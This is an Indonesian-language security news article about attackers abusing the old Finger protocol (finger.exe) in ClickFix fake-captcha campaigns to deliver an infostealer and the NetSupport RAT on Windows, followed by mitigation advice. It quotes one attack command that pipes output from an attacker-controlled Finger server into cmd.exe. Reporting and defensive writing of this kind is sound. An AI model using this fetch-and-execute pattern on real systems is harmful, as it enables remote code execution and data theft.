Protokol Jadul ‘Finger’ Disalahgunakan dalam Serangan ClickFix untuk Eksekusi Malware di Windows

Protokol Finger, fitur jaringan era Unix yang berusia puluhan tahun, kembali dimanfaatkan oleh pelaku ancaman dalam kampanye malware terbaru. Mekanisme lama ini kini digunakan untuk mengambil dan mengeksekusi perintah jarak jauh pada perangkat Windows, terutama dalam serangan ClickFix yang menipu korban melalui instruksi palsu.

Protokol Finger dan Cara Kerjanya

Pada masa kejayaannya, perintah finger digunakan untuk melihat informasi pengguna pada sistem Unix dan Linux. Fitur ini kemudian diadopsi ke Windows, meski kini jarang digunakan.

Saat dijalankan, finger menampilkan detail seperti nama login, direktori home, waktu login terakhir, hingga informasi kontak pengguna.

Meski terlihat sederhana, protokol ini dapat menjadi celah jika dimanfaatkan untuk mengambil instruksi dari server jarak jauh dan menjalankannya dalam sistem lokal.

Disalahgunakan sebagai Mekanisme Pengantar Skrip

Peneliti keamanan menemukan bahwa finger kembali disalahgunakan dalam rangkaian serangan yang tampaknya termasuk dalam skema ClickFix—modus yang memanfaatkan fake captcha atau prompt verifikasi palsu untuk memancing korban menjalankan perintah Windows.

Dalam sampel yang diamati, berkas batch yang dijalankan korban mengeksekusi perintah seperti:

finger user@server | cmd

Perintah tersebut mengambil output dari server Finger yang dikendalikan penyerang, lalu mem-pipe hasilnya langsung ke cmd.exe, sehingga perintah berbahaya dapat dieksekusi secara otomatis.

Kasus Korban Akibat “Verifikasi Captcha” Palsu

Salah satu korban di Reddit menceritakan bahwa ia tertipu oleh perintah “Verify you are human” dan menjalankan instruksi yang diberikan penyerang. Hasilnya, perangkat mengunduh arsip ZIP yang disamarkan sebagai file PDF, mengekstraknya, lalu menjalankan paket Python berbahaya.

Analisis BleepingComputer menunjukkan bahwa paket Python tersebut mengarah ke komponen infostealer, mengambil data dan mengirimkannya ke server penyerang.

Varian yang Lebih Maju: Distribusi NetSupport Manager RAT

Peneliti juga menemukan varian kampanye yang lebih canggih. Pada serangan ini, skrip yang diambil melalui Finger akan terlebih dahulu memeriksa keberadaan alat analisis malware seperti Process Monitor, Wireshark, IDA, x64dbg, dan lainnya. Jika alat tersebut terdeteksi, eksekusi akan dihentikan untuk menghindari analisis lebih lanjut.

Bila tidak ada alat analisis yang ditemukan, malware kemudian mengunduh arsip ZIP palsu lainnya yang berisi NetSupport Manager RAT, sebuah alat remote-access yang kerap disalahgunakan untuk pengendalian jarak jauh ilegal.

Skrip tersebut juga akan membuat scheduled task untuk memastikan RAT dieksekusi setiap kali pengguna masuk ke Windows.

Kenapa Serangan Ini Berbahaya?

1. Tidak terdeteksi banyak sistem keamanan, karena finger.exe adalah LOLBIN (Living-off-the-Land Binary) bawaan Windows.
2. Tidak memerlukan file berbahaya awal, karena payload diambil dan dijalankan langsung dari server Finger.
3. ClickFix mudah menipu pengguna, terutama yang terburu-buru atau tidak memahami risikonya.

Mitigasi yang Disarankan

Untuk mencegah penyalahgunaan Finger di lingkungan Windows:

• Blok koneksi outbound ke port TCP 79 (port Finger).
• Nonaktifkan atau hapus finger.exe jika tidak diperlukan dalam operasi bisnis.
• Edukasi pengguna agar tidak pernah menjalankan perintah apa pun dari pop-up atau situs web yang tidak resmi.
• Pantau aktivitas anomali yang melibatkan eksekusi cmd dengan piped input.

Serangan berbasis Finger mungkin terlihat kuno, namun kampanye terbaru membuktikan bahwa protokol jadul tetap dapat dimanfaatkan untuk aktivitas berbahaya jika tidak diawasi.